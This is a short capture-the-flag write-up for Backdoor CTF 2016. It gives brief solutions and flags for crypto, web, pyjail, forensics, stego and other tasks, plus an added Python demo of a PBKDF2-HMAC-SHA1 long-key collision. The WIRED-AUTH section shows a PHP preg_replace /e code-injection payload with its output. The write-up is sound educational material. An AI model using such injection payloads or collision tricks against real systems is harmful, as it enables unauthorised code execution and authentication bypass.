Backdoor CTF 2016 Writeup

Hello,

This is a quick and dirty writeup for Backdoor CTF 2016 tasks.

I played with my colleague Chaker within our team SpectriX which finished #13 in this CTF.

Parts of this writeup are shared between us.

COLLISION COURSE – Crypto 350

WIRED-AUTH – Web 200

The /e modifier in preg_replace() is deprecated.
I just tell the auth script that the match text should be evaluated as code after performing the replacement:
password = "/.\b/e"
key = "p(\$f)"

This will output:
PHP Notice: Undefined variable: fields_string in /root/backdoor/submit.php on line 9
4lw4y5_74k3_c4r3_wh1l3_u51n6_pr36_r3pl4c3_07h3rw153_v4mp1r3_5h4ll_f1nd_y0u!You must enter the correct password to get the flag!<br />daf88b

The flag is 4lw4y5_74k3_c4r3_wh1l3_u51n6_pr36_r3pl4c3_07h3rw153_v4mp1r3_5h4ll_f1nd_y0u!

 

WORST-PWN-EVER – Pwn 100

It is a pyjail task.
Get the name of the running script

Read its content

 

Nothing special
List env variables

{'SHLVL': '1', 'HOSTNAME': '9da6525eaa81', 'PWD': '/scripts', '_F_L_A_G_': "'SHA256(w3_mu57_d357r0y_7h3_3nv10rnm3n7_70_637_r1d_0f_n00b5)'", 'HOME': '/root', 'PATH': '/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin', '_': './shell.py'}

flag: w3_mu57_d357r0y_7h3_3nv10rnm3n7_70_637_r1d_0f_n00b5

MINBLOWN – Crypto 150

PBKDF2 collision with HMAC-SHA1.

e6~n22k81<[p”k5hhV6*
username = chintu
password = e6~n22k81<[p”k5hhV6*
flag{e8399e111069943641f1c215a3635ec709ff5ca9543d73365a6594fdce92b6bd}
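
Added example (not part of the original writeup or the challenge code): the HMAC key handling behind a PBKDF2-HMAC-SHA1 collision, where a password longer than the 64-byte block is replaced by its SHA-1 digest before use. The passwords, salt, iteration count and the `prehash` mitigation are constructed assumptions.

```python
import hashlib
import hmac

def effective_hmac_key(password: bytes, hash_name: str = "sha1") -> bytes:
    """Key HMAC really uses (RFC 2104): hashed if longer than one block, then zero-padded."""
    block = hashlib.new(hash_name).block_size  # 64 bytes for SHA-1
    if len(password) > block:
        password = hashlib.new(hash_name, password).digest()
    return password.ljust(block, b"\x00")

def pbkdf2_equivalent(p1: bytes, p2: bytes, hash_name: str = "sha1") -> bool:
    """True when both passwords give the same PBKDF2-HMAC output for every salt."""
    return hmac.compare_digest(effective_hmac_key(p1, hash_name),
                               effective_hmac_key(p2, hash_name))

def derive(password: bytes, salt: bytes, hash_name: str = "sha1") -> bytes:
    """PBKDF2-HMAC with constructed parameters: 1000 iterations, 20-byte output."""
    return hashlib.pbkdf2_hmac(hash_name, password, salt, 1000, 20)

def prehash(password: bytes) -> bytes:
    """One possible mitigation (assumption, not from the page): hash the input
    with SHA-256 first. The 64-character hex digest fills the block exactly,
    so HMAC never takes the hash-the-long-key path."""
    return hashlib.sha256(password).hexdigest().encode()

# Constructed sample values, not taken from the challenge.
SALT = b"constructed-salt"
LONG = b"constructed-sample-password-" * 3   # 84 bytes, longer than the block
TWIN = hashlib.sha1(LONG).digest()           # 20 bytes, a different "password"

if __name__ == "__main__":
    print("same derived key   :", derive(LONG, SALT) == derive(TWIN, SALT))
    print("predicted collision:", pbkdf2_equivalent(LONG, TWIN))
    print("after prehash      :",
          derive(prehash(LONG), SALT) == derive(prehash(TWIN), SALT))
```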

ISOLVE – PPC 200

Flag: 56490776814fdd91c81309b95fd11dbc8750a6a7f275e712550db6c34a901c62

BUSYBEE – Forensic 150

Two busybox copies, one renamed to “[” and the other to “cat”; one of the two binaries is infected.
I renamed them to busybox1 and busybox2.
Just diff them:

 

64454,64458c64454
< 00fbc50: 0000 0000 0000 000a 0a0a 0a54 4849 5320 ………..THIS
< 00fbc60: 4953 2057 4841 5420 594f 5520 4152 4520 IS WHAT YOU ARE
< 00fbc70: 4c4f 4f4b 494e 4720 464f 523a 2020 2020 LOOKING FOR:
< 00fbc80: 306e 335f 6e30 3062 5f72 7531 6e35 5f30 0n3_n00b_ru1n5_0
< 00fbc90: 6e33 5f68 756e 6472 3364 5f70 7230 3500 n3_hundr3d_pr05.

flag 0n3_n00b_ru1n5_0n3_hundr3d_pr05

DTUNE – Misc 70

Just read the DTMF tones and replace the mobile phone key codes with the corresponding letter (T9 Cipher)
THE FLAG IS SHA256 OF EPCDHXHMCAQW

IMAGESOLVER – Web 70

Submit the http://164.132.103.207/cookie.php link
Content of r.txt
Cookie: flag=e30524a77d014c2cba94e9f0c04e01e0c083a7388a16d3fc60f8d9c731dc8ac9 <br />
host: 164.132.103.207 <br />
Connection: close <br />
Flag is e30524a77d014c2cba94e9f0c04e01e0c083a7388a16d3fc60f8d9c731dc8ac9

DEBUG – Rev 30

Can be solved statically

Flag is i_has_debugger_skill

LOSELESS – Stego 100

Calculate the diff between the encrypted and the original picture

This gives a 49×7 matrix

1110111101101110001101101110110110110011010111001
0111111111110001111111111111011011111111111101111
1000000000101001111010010101111101011010100110111
0100010001000100001000000010100100000100010011011
1010110100000000110101100111110110011110111110111
0000100100101001011001101001100110100010011010110
0010001101101010101010011101100100111011101011111

Each column corresponds to one char of the flag
d1ff1cul7_t0_f0cu5,wa5n’t_i7?

 

That’s all 🙂
